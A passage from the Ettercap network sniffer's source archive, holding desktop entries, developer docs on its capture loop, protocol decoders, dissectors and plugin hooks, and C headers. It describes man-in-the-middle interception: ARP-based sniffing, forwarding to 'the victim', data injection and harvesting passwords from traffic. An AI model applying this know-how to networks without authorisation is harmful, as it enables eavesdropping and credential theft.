http://ettercap.github.io/ettercap/screenshots/Screenshot-1.png http://ettercap.github.io/ettercap/screenshots/Screenshot-2.png http://ettercap.github.io/ettercap/ ettercap.project@gmail.com ettercap-0.8.3.1/desktop/ettercap.desktop000664 000000 000000 00000000333 13711276346 020334 0ustar00rootroot000000 000000 [Desktop Entry] Name=Ettercap Comment=Multipurpose Network sniffer/analyser/interceptor/logger Exec=ettercap-pkexec -G Icon=ettercap Terminal=false Type=Application Categories=Network; Keywords=ettercap,ettercap-pkexec ettercap-0.8.3.1/desktop/ettercap.metainfo.xml000664 000000 000000 00000003415 13711276346 021270 0ustar00rootroot000000 000000 io.github.ettercap ettercap.desktop MIT GPL-2.0 Ettercap Multipurpose Network sniffer/analyser/interceptor/logger

Ettercap supports active and passive dissection of many protocols (even encrypted ones) and includes many feature for network and host analysis. Data injection in an established connection and filtering (substitute or drop a packet) on the fly is also possible, keeping the connection synchronized.

Many sniffing modes are implemented, for a powerful and complete sniffing suite. It is possible to sniff in four modes: IP Based, MAC Based, ARP Based (full-duplex) and PublicARP Based (half-duplex). Ettercap also has the ability to detect a switched LAN, and to use OS fingerprints (active or passive) to find the geometry of the LAN.

https://www.ettercap-project.org/screenshots/Screenshot-1.png https://www.ettercap-project.org/screenshots/Screenshot-2.png https://www.ettercap-project.org https://github.com/Ettercap/ettercap/issues ettercap.project@gmail.com ettercap-0.8.3.1/desktop/org.pkexec.ettercap.policy.in000664 000000 000000 00000001326 13711276346 022636 0ustar00rootroot000000 000000 Authentication is required to run Ettercap ettercap auth_admin auth_admin auth_admin @INSTALL_BINDIR@/ettercap true ettercap-0.8.3.1/doc/000775 000000 000000 00000000000 13711276346 014227 5ustar00rootroot000000 000000 ettercap-0.8.3.1/doc/capture000664 000000 000000 00000003405 13711276346 015617 0ustar00rootroot000000 000000 =============================================================================== TOPIC: capture ABSTRACT: this file describes how the capture process works within ettercap NOTE: when in bridged sniffing, two threads are spawned, one for each network interface. =============================================================================== Here is represented in Very-High-Level-Language the capture thread behavior: loop { receives a single packet from the pcap callback updates the packet statistics dump the packet to a file (if the user has requested it) if (truncated) continue; creates the packet object determine the interface where the packet was captured HOOK POINT: HOOK_RECEIVED starts the protocol decoding -> the packet is decoded by decoder and the po is filled -> the ip and tcp sessions are created -> the middle layer is called (only if TCP or UDP) -> if (PO_DONT_DISSECT) return; -> set the PO_IGNORE according to the visualization filters -> HOOK POINT: HOOK_HANDLED -> if (PO_IGNORE) return; -> execute the dissectors -> HOOK POINT: HOOK_DECODED -> execute the filtering engine -> HOOK POINT: HOOK_FILTER -> a copy of the packet is added to the top_half queue if (PO_FORWARDABLE) { HOOK POINT: HOOK_PRE_FORWARD forward the packet to the real host (the victim) } destroy the packet object } Top_half thread behavior: loop { extract a packet from the top_half queue HOOK POINT: HOOK_DISPATCHER destroy the packet } EOF ettercap-0.8.3.1/doc/decoders000664 000000 000000 00000004465 13711276346 015753 0ustar00rootroot000000 000000 =============================================================================== TOPIC: decoder ABSTRACT: this file describes how to write a protocol decoder and how to fill the structures in order to ettercap understand them NOTE: decoders refers to functions analyzing protocols such as TCP or UDP. functions that handle the application level of the TCP/IP stack are called dissectors and they are stored in the src/dissectors directory. =============================================================================== The decoders are organized as in a protocol stack as for the TCP/IP stack. The captured packet is passed to the decoder of the lowest level (link layer) which decodes its header, fills the struct in the packet object and pass the packet to the decoder of the upper level. Each decoder calls the next one according to the type of packet carried by the current header. For example the ethernet decoder call the next one looking at the eth->proto field (0x0800 for IP). You can imagine the process as a stack of layers. The packet goes up while gets decoded and down when each decoder returns. In the descending phase you can adjust the packet if a modification in the upper layer has been performed. Each decoder must register itself with the add_decoder() function. The decoder must provide a level (as for the ISO/OSI stack) and a type (for the specific protocol). A decoder must use the macro provided in the ec_decode.h file. The main function must be declared as: FUNC_DECODER(new_decoder) { ... } within the function code, some macro are provided to properly handle the structures. DECODED_LEN (int) is the len of the data the decoder can parse PACKET (struct packet_object) the PO structure associated with data FUNC_DECODER_PTR() can be used to declare a pointer to a decoder. get_decoder(level, type) this fuction is used to retrieve a decoder for a give level. the decoder are registered in the list of decoder on startup. every decoder registers itself in the proper level (2 for eth, 3 for ip, etc) in the __init function. EXECUTE_DECODER() this macro is used to execute the next decoder in the stack. EOF ettercap-0.8.3.1/doc/dissectors000664 000000 000000 00000004700 13711276346 016335 0ustar00rootroot000000 000000 =============================================================================== TOPIC: dissector ABSTRACT: this file describes how to write a dissector and how to fill the correct structures in order to ettercap understand them NOTE: dissectors refers to functions analyzing application protocols such as FTP or POP. functions that handle the lower level of the TCP/IP stack are called decoder and they are stored in the src/protocols directory. =============================================================================== A dissector must use the macro provided in the ec_decode.h file. The main function must be declared as: FUNC_DECODER(new_dissector) { ... } within the function code, some macro are provided to properly handle the structures. DECODE_DATALEN (int) is the len of the data the decoder can parse DECODE_DATA (u_char) is the buffer containing the data PACKET (struct packet_object) the PO structure associated with data DECLARE_REAL_PTR_END(x,y) used to declare two u_char pointer, one (x) at the beginning of the data and one (y) at the end. DECLARE_DISP_PTR_END(x,y) used to declare two u_char pointer, one (x) at the beginning of the disp_data buffer and one (y) at the end. DISPLAY_DATA (u_char) it is the buffer it will be displayed in the interface. this is made because encrypted protocols must be forwarded encrypted, but visualized as plain text. if the protocols is already in plain text don't have to copy the data in the buffer, otherwise copy the decrypted text in this buffer DISPLAY_LEN (int) set it to the len of the decrypted data. User and pass information must be sent in the same packet. This is mandatory for the correct association with the passive profiling of the servers. They must be sent associated with a packet GOING TO the server. The banner identification of the service have to be sent associate with a packet COMING FROM the server port. Since the dissector function is invoked one time per packet, the dissector has the scope of a single packet not a stream. You have to take care of this and use the sessions management (see the relative documentation) to pass data through subsequent activation of the function. EOF ettercap-0.8.3.1/doc/plugins000664 000000 000000 00000016016 13711276346 015637 0ustar00rootroot000000 000000 =============================================================================== TOPIC: plugins ABSTRACT: this file describes how to write a plugin for ettercap NG NOTE: the plugin system has been modified since ettercap NG 0.7.0, all plugins coded for the 0.6.x series must be ported to the new api. =============================================================================== We believe that an example tells much more than thousand words. So we wrote a plugin templates to demonstrate how to write a simple plugin. The template is called "dummy". Look at its source code (well commented). However here there are some directive you have to respect. 1) THE INCLUDES #include /* required for global variables */ #include /* required for plugin ops */ these are required, but you can include as many includes as you want. 2) PLUGIN OPERATION struct plugin_ops ops = { .ettercap_version = EC_VERSION, .name = "plugin name", .info = "description of the plugin", .version = "x.y", .init = &init_function, .fini = &fini_function, }; for every plugin you have to fill this structure with the appropriate fields. This structure MUST be passed to plugin_register() in the plugin_load() function. (see below) ettercap_version: MUST be the global EC_VERSION. this variable is used for internal check to prevent that a plugin compiled for an ettercap version will be used with a different api version. name: is a string containing the name of the plugin info: is a string with the description of the plugin version: is a string with the version of the plugin init: is a pointer to the function ettercap has to call on when the user selects the plugin fini: is a pointer to the function to be executed to deactivate the plugin 3) INITIALIZATION AND FINALIZATION Every plugin MUST contain a function called plugin_load(). This function is called by ettercap when the plugin is loaded by lt_dlopen(). It is used to register the plugin in the plugin list. To do this, it MUST return to value returned by plugin_register(). The plugin_register() wants two parameter, the handle passed to plugin_load and the plugin_ops described above. int plugin_load(void *handle) { . . . return plugin_register(handle, &ops); } When the user activate the plugin, ettercap calls the function registered in the plugin_ops as 'init'. If the user wants to deactivate the plugins, ettercap calls the registered 'fini' function. You can do whatever you want in this functions, the only thing to be respected is the return value. There are two different return value: PLUGIN_FINISHED: the plugin has finished its execution. The fini function will never be called. This is usually used if the plugin perform an operation and exit (as for the old external plugins) PLUGIN_RUNNING: the plugin is still running and will be deactivated with the fini function. This is used if the plugin spawns a thread or it has hooked to an ettercap hookpoint. In case the plugin has created a thread, it must be killed in the 'fini' function. 4) HOOKING POINTS An hooking function must be declared as: void func(struct packet_object *po) Every hook point recall the function passing the packet object as the parameter. HOOK_RECEIVED the raw packet, the L* structures are not filled. you can modify the packet before the protocol analysis starts. HOOK_DECODED all the packet after the protocol stack parsing and after the dissectors. here you can find interesting information such as passwords and fingerprints. HOOK_PRE_FORWARD right before the forward point. the hook is executed only if it has to be forwarded. HOOK_HANDLED top of the protocol stack but before the dissectors. you can set/unset the PO_IGNORE flag to decide to not pass the packet to the top_half HOOK_FILTER the content filtering point. the hook point is right after the filtering engine. HOOK_DISPATCHER in the top_half (the packet is a copy). if you modify the packet here there is no change to see the modification on the wire :) You can use this hook for operations that requires much time but don't modify the packet. Since the capture thread must be fast (to forward all the packets) the cpu consuming task (such as connection tracking and profiles management) are performed in the top_half. HOOK_PACKET_* Every packet type as a different hook point. If you want to receive only tcp packet, hook to the HOOK_PACKET_TCP, if you want ppp packet, hook to HOOK_PACKET_PPP and so on... These hooks are declared in the protocol decoder (./src/protocols/*.c) HOOK_PROTO_* Some protocols declare an hookpoint. Look in ./src/dissectors/*.c to have a list of hooks. refer to the 'capture' document in order to have a complete view of the hooking system. 5) ETTERCAP API + USER_MSG() same as printf(), but required in order to output to the user interface. use this function if the plugin has to communicate with the user. + INSTANT_USER_MSG() same as USER_MSG but without buffering. the buffer flush is called immediately. usually is the GUI that call the flush periodically (every 10 msec). + ui_input() if the plugin needs some input from the user. you can provide a callback or not, depending of what the function does. Obviously a plugin can use all the ettercap function and its global variables. They are not described here because it is out of the document scope. feel free to write an email to the developer to have further information. EOF ettercap-0.8.3.1/doc/threads000664 000000 000000 00000003600 13711276346 015603 0ustar00rootroot000000 000000 =============================================================================== TOPIC: threads ABSTRACT: this file describes how threads are managed by ettercap NOTE: none =============================================================================== ettercap uses the pthread library to manage internal threads. the file ec_threads.c gives to the developer some wrapper to create ettercap threads. in the file ec_thread.h we find these functions: char * ec_thread_getname(pthread_t id); to get the name of a thread. this is only useful for debugging purpose. the DEBUG_MSG macro prints the name of the thread and then the message, so you can easily know which thread is doing what. pthread_t ec_thread_getpid(char *name); to get the pid of a given thread. it is used to kill a thread previously created with a specific name. void ec_thread_register(pthread_t id, char *name, char *desc); to give a name and a description to a thread. pthread_t ec_thread_new(char *name, char *desc, void *(*function)(void *), void *args); to create a thread. the third parameter is the function that will become the main of the thread. the fourth parameter is used to pass a parameter to the thread. void ec_thread_init(void); this function must be called by the newly created thread to synchronize with the thread that has created it. it unlock a special mutex, so it is mandatory to perform this action, else ettercap will lockup. void ec_thread_destroy(pthread_t id); to kill a thread. ettercap uses the pthread_join inside this function. this is because we have to wait that the thread has finished its clean up before continuing with other operations. void ec_thread_kill_all(void); to kill all the thread but the caller of the function itself :) EOF ettercap-0.8.3.1/include/000775 000000 000000 00000000000 13711276346 015105 5ustar00rootroot000000 000000 ettercap-0.8.3.1/include/config.h.cmake000664 000000 000000 00000003667 13711276346 017616 0ustar00rootroot000000 000000 #ifndef CONFIG_H #cmakedefine OS_LINUX #cmakedefine OS_BSD #cmakedefine OS_BSD_FREE #cmakedefine OS_BSD_NET #cmakedefine OS_BSD_OPEN #cmakedefine OS_DARWIN #cmakedefine OS_GNU #cmakedefine WORDS_BIGENDIAN #cmakedefine OS_SIZEOF_P @OS_SIZEOF_P@ #cmakedefine CC_VERSION "@CC_VERSION@" #cmakedefine HAVE_SYS_SELECT_H #cmakedefine HAVE_SYS_POLL_H #cmakedefine HAVE_UTSNAME_H #cmakedefine HAVE_STDINT_H #cmakedefine HAVE_GETOPT_H #cmakedefine HAVE_ARPA_NAMESER_H #cmakedefine HAVE_LTDL_H #cmakedefine HAVE_DLFCN_H #cmakedefine HAVE_CTYPE_H #cmakedefine HAVE_INTTYPES_H #cmakedefine HAVE_MUTEX_RECURSIVE_NP #cmakedefine HAVE_IP6T_SO_ORIGINAL_DST #cmakedefine HAVE_LIBGEN_H #cmakedefine HAVE_PCRE #cmakedefine HAVE_POLL #cmakedefine HAVE_STRTOK_R #cmakedefine HAVE_STRNDUP #cmakedefine HAVE_SELECT #cmakedefine HAVE_SCANDIR #cmakedefine HAVE_STRLCAT #cmakedefine HAVE_STRLCAT_FUNCTION #cmakedefine HAVE_STRLCPY #cmakedefine HAVE_STRLCPY_FUNCTION #cmakedefine HAVE_STRSEP #cmakedefine HAVE_STRCASESTR #cmakedefine HAVE_MEMMEM #cmakedefine HAVE_MEMRCHR #cmakedefine HAVE_BASENAME #cmakedefine HAVE_NCURSES #cmakedefine HAVE_GTK #cmakedefine HAVE_GTK3 #cmakedefine HAVE_GTK3COMPAT #cmakedefine HAVE_UTF8 #cmakedefine HAVE_PLUGINS #cmakedefine WITH_IPV6 #cmakedefine HAVE_GEOIP #cmakedefine HAVE_EC_LUA #cmakedefine HAVE_CURL #cmakedefine INSTALL_PREFIX "@INSTALL_PREFIX@" #cmakedefine INSTALL_SYSCONFDIR "@INSTALL_SYSCONFDIR@" #cmakedefine INSTALL_LIBDIR "@INSTALL_LIBDIR@" #cmakedefine INSTALL_DATADIR "@INSTALL_DATADIR@" #cmakedefine INSTALL_EXECPREFIX "@INSTALL_EXECPREFIX@" #cmakedefine INSTALL_BINDIR "@INSTALL_BINDIR@" #cmakedefine ICON_DIR "@ICON_DIR@" #cmakedefine MAN_INSTALLDIR "@MAN_INSTALLDIR@" #cmakedefine JUST_LIBRARY #cmakedefine LIBNET_VERSION "@LIBNET_VERSION@" #cmakedefine LIBNET_VERSION_MAJOR @LIBNET_VERSION_MAJOR@ #cmakedefine LIBNET_VERSION_MINOR @LIBNET_VERSION_MINOR@ #endif ettercap-0.8.3.1/include/ec.h000664 000000 000000 00000011224 13711276346 015645 0ustar00rootroot000000 000000 #ifndef ETTERCAP_H #define ETTERCAP_H #include #include #include #include #include #include #ifdef OS_WINDOWS #include #endif #if defined OS_DARWIN || defined OS_BSD #define PCAP_DONT_INCLUDE_PCAP_BPF_H 1 #include #endif #ifndef PATH_MAX #define PATH_MAX 1024 #endif #if !defined (__USE_GNU) /* for memmem(), strsignal(), etc etc... */ #define __USE_GNU #endif #ifdef OS_SOLARIS #define _REENTRANT /* for strtok_r() */ #endif #include #if defined (__USE_GNU) #undef __USE_GNU #endif #include #include #include /* * On Windows (MinGw) we must export all ettercap.exe variables/function * used in plugins and functions in plugins must be declared as 'importable' */ #if defined(OS_WINDOWS) #if defined(BUILDING_PLUGIN) #define EC_API_EXTERN __declspec(dllimport) #else #define EC_API_EXTERN __declspec(dllexport) #endif #else #define EC_API_EXTERN extern #endif /* these are often needed... */ #include #include #include #include #include #include #ifdef OS_MINGW #include #endif /* wrappers for safe memory allocation */ #define SAFE_CALLOC(x, n, s) do { \ x = calloc(n, s); \ ON_ERROR(x, NULL, "virtual memory exhausted"); \ } while(0) #define SAFE_MALLOC(x, s) do { \ x = malloc(s); \ ON_ERROR(x, NULL, "virtual memory exhausted"); \ } while (0) #define SAFE_REALLOC(x, s) do { \ x = realloc(x, s); \ ON_ERROR(x, NULL, "virtual memory exhausted"); \ } while(0) #define SAFE_STRDUP(x, s) do{ \ x = strdup(s); \ ON_ERROR(x, NULL, "virtual memory exhausted"); \ }while(0) #define SAFE_FREE(x) do{ if(x) { free(x); x = NULL; } }while(0) /* convert to string */ #define EC_STRINGIFY(in) #in #define EC_TOSTRING(in) EC_STRINGIFY(in) // No need to have a priority in the constructor at this moment /* #if __GNUC_PREREQ(4,3) #define __init __attribute__ ((constructor(101))) #else */ #define __init __attribute__ ((constructor)) //#endif #ifndef __set_errno #define __set_errno(e) (errno = (e)) #endif #define LOOP for(;;) #define EXECUTE(x, ...) do{ if(x != NULL) x( __VA_ARGS__ ); }while(0) /* couple of useful macros */ #ifndef offsetof #define offsetof(type, member) ((size_t) &((type*)0)->member) #endif #ifndef containerof #define containerof(ptr, type, member) ((type*)((char*)ptr - offsetof(type,member))) #endif /* min and max */ #ifndef MIN #define MIN(a, b) (((a) < (b)) ? (a) : (b)) #endif #ifndef MAX #define MAX(a, b) (((a) > (b)) ? (a) : (b)) #endif /* timeunit conversions */ #define SEC2NANO(x) x * 1000000000 #define MILLI2NANO(x) x * 1000000 #define MICRO2NANO(x) x * 1000 #define SEC2MICRO(x) x * 1000000 #define MILLI2MICRO(x) x * 1000 #define MILLI2SEC(x) x / 1000 #define MICRO2SEC(x) x / 1000000 #define NANO2SEC(x) x / 1000000000 /* file operations */ #ifndef OS_WINDOWS #define O_BINARY 0 #endif /* bit operations */ #define BIT_SET(r,b) ( r[b>>3] |= 1<<(b&7) ) #define BIT_RESET(r,b) ( r[b>>3] &= ~ 1<<(b&7) ) #define BIT_TEST(r,b) ( r[b>>3] & 1<<(b&7) ) #define BIT_NOT(r,b) ( r[b>>3] ^= 1<<(b&7) ) /* Save and restore relative offsets for pointers into a buffer */ #define SAVE_OFFSET(o,b) o=(u_int8 *)((int)o-(int)b) #define RESTORE_OFFSET(o,b) o=(u_int8 *)((int)o+(int)b) /* ANSI colors */ #ifndef OS_WINDOWS #define EC_COLOR_END "\033[0m" #define EC_COLOR_BOLD "\033[1m" #define EC_COLOR_RED "\033[31m"EC_COLOR_BOLD #define EC_COLOR_YELLOW "\033[33m"EC_COLOR_BOLD #define EC_COLOR_GREEN "\033[32m"EC_COLOR_BOLD #define EC_COLOR_BLUE "\033[34m"EC_COLOR_BOLD #define EC_COLOR_CYAN "\033[36m"EC_COLOR_BOLD #else /* Windows console doesn't grok ANSI */ #define EC_COLOR_END #define EC_COLOR_BOLD #define EC_COLOR_RED #define EC_COLOR_YELLOW #define EC_COLOR_GREEN #define EC_COLOR_BLUE #define EC_COLOR_CYAN #endif /* magic numbers */ #ifndef RANDMAGIC #define EC_MAGIC_8 0xec #define EC_MAGIC_16 0xe77e #define EC_MAGIC_32 0xe77ee77e #else #define EC_MAGIC_8 ((RANDMAGIC & 0x0ff0) >> 4) #define EC_MAGIC_16 (RANDMAGIC & 0xffff) #define EC_MAGIC_32 (((RANDMAGIC & 0xff) << 8)|((RANDMAGIC & 0xff00) >> 8)|(RANDMAGIC & 0xffff0000)) #endif /* exported by ec_main */ EC_API_EXTERN void clean_exit(int errcode); /* exported by ec_mem */ EC_API_EXTERN void safe_free_mem(char **param, int *param_length, char *command); #endif /* EC_H */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_asn1.h000664 000000 000000 00000005400 13711276346 016566 0ustar00rootroot000000 000000 /* * ASN.1 DER parsing * Copyright (c) 2006, Jouni Malinen * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * Alternatively, this software may be distributed under the terms of BSD * license. * * See README and COPYING for more details. */ #include #include #include #ifndef ETTERCAP_ASN1_H #define ETTERCAP_ASN1_H #define ASN1_TAG_EOC 0x00 /* not used with DER */ #define ASN1_TAG_BOOLEAN 0x01 #define ASN1_TAG_INTEGER 0x02 #define ASN1_TAG_BITSTRING 0x03 #define ASN1_TAG_OCTETSTRING 0x04 #define ASN1_TAG_NULL 0x05 #define ASN1_TAG_OID 0x06 #define ASN1_TAG_OBJECT_DESCRIPTOR 0x07 /* not yet parsed */ #define ASN1_TAG_EXTERNAL 0x08 /* not yet parsed */ #define ASN1_TAG_REAL 0x09 /* not yet parsed */ #define ASN1_TAG_ENUMERATED 0x0A /* not yet parsed */ #define ASN1_TAG_UTF8STRING 0x0C /* not yet parsed */ #define ANS1_TAG_RELATIVE_OID 0x0D #define ASN1_TAG_SEQUENCE 0x10 /* shall be constructed */ #define ASN1_TAG_SET 0x11 #define ASN1_TAG_NUMERICSTRING 0x12 /* not yet parsed */ #define ASN1_TAG_PRINTABLESTRING 0x13 #define ASN1_TAG_TG1STRING 0x14 /* not yet parsed */ #define ASN1_TAG_VIDEOTEXSTRING 0x15 /* not yet parsed */ #define ASN1_TAG_IA5STRING 0x16 #define ASN1_TAG_UTCTIME 0x17 #define ASN1_TAG_GENERALIZEDTIME 0x18 /* not yet parsed */ #define ASN1_TAG_GRAPHICSTRING 0x19 /* not yet parsed */ #define ASN1_TAG_VISIBLESTRING 0x1A #define ASN1_TAG_GENERALSTRING 0x1B /* not yet parsed */ #define ASN1_TAG_UNIVERSALSTRING 0x1C /* not yet parsed */ #define ASN1_TAG_BMPSTRING 0x1D /* not yet parsed */ #define ASN1_CLASS_UNIVERSAL 0 #define ASN1_CLASS_APPLICATION 1 #define ASN1_CLASS_CONTEXT_SPECIFIC 2 #define ASN1_CLASS_PRIVATE 3 struct asn1_hdr { uint8_t *payload; uint8_t identifier, class, constructed; unsigned int tag, length; }; #define ASN1_MAX_OID_LEN 20 struct asn1_oid { unsigned long oid[ASN1_MAX_OID_LEN]; size_t len; }; EC_API_EXTERN int asn1_get_next(uint8_t *buf, size_t len, struct asn1_hdr *hdr); EC_API_EXTERN int asn1_parse_oid(uint8_t *buf, size_t len, struct asn1_oid *oid); EC_API_EXTERN int asn1_get_oid(uint8_t *buf, size_t len, struct asn1_oid *oid, uint8_t **next); EC_API_EXTERN void asn1_oid_to_str(struct asn1_oid *oid, char *buf, size_t len); EC_API_EXTERN unsigned long asn1_bit_string_to_long(uint8_t *buf, size_t len); #endif /* ETTERCAP_ASN1_H */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_capture.h000664 000000 000000 00000001176 13711276346 017375 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CAPTURE_H #define ETTERCAP_CAPTURE_H #include #include EC_API_EXTERN void capture_start(struct iface_env *); EC_API_EXTERN void capture_stop(struct iface_env *); EC_API_EXTERN EC_THREAD_FUNC(capture); EC_API_EXTERN int is_pcap_file(char *file, char *pcap_errbuf); EC_API_EXTERN void capture_getifs(void); EC_API_EXTERN char* capture_default_if(void); #define FUNC_ALIGNER(func) int func(void) #define FUNC_ALIGNER_PTR(func) int (*func)(void) EC_API_EXTERN u_int8 get_alignment(int dlt); EC_API_EXTERN void add_aligner(int dlt, int (*aligner)(void)); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_checksum.h000664 000000 000000 00000001036 13711276346 017527 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CHECKSUM_H #define ETTERCAP_CHECKSUM_H #include EC_API_EXTERN u_int16 L3_checksum(u_char *buf, size_t len); EC_API_EXTERN u_int16 L4_checksum(struct packet_object *po); #define CSUM_INIT 0 #define CSUM_RESULT 0 EC_API_EXTERN u_int32 CRC_checksum(u_char *buf, size_t len, u_int32 init); #define CRC_INIT_ZERO 0x0 #define CRC_INIT 0xffffffff #define CRC_RESULT 0xdebb20e3 EC_API_EXTERN u_int16 checksum_shouldbe(u_int16 sum, u_int16 computed_sum); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_conf.h000664 000000 000000 00000000505 13711276346 016652 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CONF_H #define ETTERCAP_CONF_H struct conf_entry { char *name; void *value; }; struct conf_section { char *title; struct conf_entry *entries; }; /* exported functions */ EC_API_EXTERN void load_conf(void); EC_API_EXTERN void conf_dissectors(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_connbuf.h000664 000000 000000 00000002005 13711276346 017354 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CONNBUF_H #define ETTERCAP_CONNBUF_H #include #include struct conn_buf { /* the lock */ pthread_mutex_t connbuf_mutex; /* max buffer size */ size_t max_size; /* actual buffer size */ size_t size; /* the real buffer made up of a tail of packets */ TAILQ_HEAD(connbuf_head, conn_pck_list) connbuf_tail; }; /* an entry in the tail */ struct conn_pck_list { /* size of the element (including the struct size) */ size_t size; /* the source of the packet */ struct ip_addr L3_src; /* the data */ u_char *buf; /* the link to the next element */ TAILQ_ENTRY(conn_pck_list) next; }; /* functions */ EC_API_EXTERN void connbuf_init(struct conn_buf *cb, size_t size); EC_API_EXTERN int connbuf_add(struct conn_buf *cb, struct packet_object *po); EC_API_EXTERN void connbuf_wipe(struct conn_buf *cb); EC_API_EXTERN int connbuf_print(struct conn_buf *cb, void (*)(u_char *, size_t, struct ip_addr *)); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_conntrack.h000664 000000 000000 00000005047 13711276346 017715 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CONNTRACK_H #define ETTERCAP_CONNTRACK_H #include #include /* conntrack hook definition */ struct ct_hook_list { void (*func)(struct packet_object *po); SLIST_ENTRY (ct_hook_list) next; }; /* conntrack object */ struct conn_object { /* last updated (for connection timeout) */ struct timeval ts; /* mac addresses */ u_int8 L2_addr1[MEDIA_ADDR_LEN]; u_int8 L2_addr2[MEDIA_ADDR_LEN]; /* ip addresses */ struct ip_addr L3_addr1; struct ip_addr L3_addr2; /* port numbers */ u_int16 L4_addr1; u_int16 L4_addr2; u_int8 L4_proto; /* buffered data */ struct conn_buf data; /* byte count since the creation */ u_int32 xferred; /* XXX: remove it some day */ u_int32 tx; /* from 1 to 2 */ u_int32 rx; /* from 2 to 1 */ /* connection status */ int status; /* flags for injection/modifications */ int flags; /* username and password */ struct dissector_info DISSECTOR; /* hookpoint to receive only packet of this connection */ SLIST_HEAD(, ct_hook_list) hook_head; }; struct conn_tail { struct conn_object *co; struct conn_hash_search *cs; TAILQ_ENTRY(conn_tail) next; }; enum { CONN_IDLE = 0, CONN_OPENING = 1, CONN_OPEN = 2, CONN_ACTIVE = 3, CONN_CLOSING = 4, CONN_CLOSED = 5, CONN_KILLED = 6, }; enum { CONN_INJECTED = 1, CONN_MODIFIED = 2, CONN_VIEWING = 4, }; /* exported functions */ EC_API_EXTERN void * conntrack_print(int mode, void *list, char **desc, size_t len); EC_API_EXTERN void * conntrack_get(int mode, void *list, struct conn_object **conn); EC_API_EXTERN int conntrack_protostr(struct conn_object *conn, char *pstr, int len); EC_API_EXTERN int conntrack_flagstr(struct conn_object *conn, char *pstr, int len); EC_API_EXTERN int conntrack_statusstr(struct conn_object *conn, char *pstr, int len); EC_API_EXTERN int conntrack_countrystr(struct conn_object *conn, char *pstr, int len); EC_API_EXTERN EC_THREAD_FUNC(conntrack_timeouter); EC_API_EXTERN void conntrack_purge(void); EC_API_EXTERN int conntrack_hook_packet_add(struct packet_object *po, void (*func)(struct packet_object *po)); EC_API_EXTERN int conntrack_hook_packet_del(struct packet_object *po, void (*func)(struct packet_object *po)); EC_API_EXTERN int conntrack_hook_conn_add(struct conn_object *co, void (*func)(struct packet_object *po)); EC_API_EXTERN int conntrack_hook_conn_del(struct conn_object *co, void (*func)(struct packet_object *po)); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_debug.h000664 000000 000000 00000001424 13711276346 017014 0ustar00rootroot000000 000000 #if defined(DEBUG) && !defined(ETTERCAP_DEBUG_H) #define ETTERCAP_DEBUG_H EC_API_EXTERN void debug_init(void); EC_API_EXTERN void debug_msg(const char *message, ...); EC_API_EXTERN FILE *debug_file; #define DEBUG_INIT() debug_init() #define DEBUG_MSG(x, ...) do { \ if (debug_file == NULL) { \ fprintf(stderr, "DEBUG: "x"\n", ## __VA_ARGS__ ); \ } else \ debug_msg(x, ## __VA_ARGS__ ); \ } while(0) #endif /* EC_DEBUG_H */ /* * if DEBUG is not defined we expand the macros to null instructions... */ #ifndef DEBUG #define DEBUG_INIT() #define DEBUG_MSG(x, ...) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_decode.h000664 000000 000000 00000003325 13711276346 017153 0ustar00rootroot000000 000000 #ifndef ETTERCAP_DECODE_H #define ETTERCAP_DECODE_H #include #include #include #include /* layer canonical name */ enum { IFACE_LAYER = 1, LINK_LAYER = 2, NET_LAYER = 3, NET6_LAYER = 31, /* IPv6 options */ PROTO_LAYER = 4, APP_LAYER = 5, /* special case for the middleware decoder. don't use it */ APP_LAYER_TCP = 51, APP_LAYER_UDP = 52, }; #define FUNC_DECODER(func) void * func(u_char *buf, u_int16 buflen, int *len, struct packet_object *po) #define FUNC_DECODER_PTR(func) void * (*func)(u_char *buf, u_int16 buflen, int *len, struct packet_object *po) #define DECODE_DATALEN buflen #define DECODE_DATA buf #define DECODED_LEN *len #define PACKET po #define EXECUTE_DECODER(x) do{ \ if (x) \ x(DECODE_DATA+DECODED_LEN, DECODE_DATALEN-DECODED_LEN, len, PACKET); \ }while(0) #define DECLARE_REAL_PTR_END(x,y) u_char *x = po->DATA.data; \ u_char *y = x + po->DATA.len #define DECLARE_DISP_PTR_END(x,y) u_char *x = po->DATA.disp_data; \ u_char *y = x + po->DATA.disp_len #define DECLARE_DISP_PTR(x) u_char *x = po->DATA.disp_data #define DISPLAY_DATA po->disp_data #define DISPLAY_LEN po->disp_len /* exported functions */ EC_API_EXTERN void ec_decode(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt); EC_API_EXTERN void add_decoder(u_int8 level, u_int32 type, FUNC_DECODER_PTR(decoder)); EC_API_EXTERN void del_decoder(u_int8 level, u_int32 type); EC_API_EXTERN void *get_decoder(u_int8 level, u_int32 type); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_dispatcher.h000664 000000 000000 00000000401 13711276346 020046 0ustar00rootroot000000 000000 #ifndef ETTERCAP_DISPATCHER_H #define ETTERCAP_DISPATCHER_H #include #include EC_API_EXTERN void top_half_queue_add(struct packet_object *po); EC_API_EXTERN EC_THREAD_FUNC(top_half); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_dissect.h000664 000000 000000 00000010342 13711276346 017363 0ustar00rootroot000000 000000 #ifndef ETTERCAP_DISSECT_H #define ETTERCAP_DISSECT_H #include #include #include /* session identifier */ struct dissect_ident { union { u_int64 magic; void *fptr; }; struct ip_addr L3_src; struct ip_addr L3_dst; u_int16 L4_src; u_int16 L4_dst; u_int8 L4_proto; /* Odd byte has to be the last for correct session hash matching */ }; #define DISSECT_IDENT_LEN sizeof(struct dissect_ident) #define DISSECT_CODE(x) (void*)(x) /* exported functions */ EC_API_EXTERN void dissect_add(char *name, u_int8 level, u_int32 port, 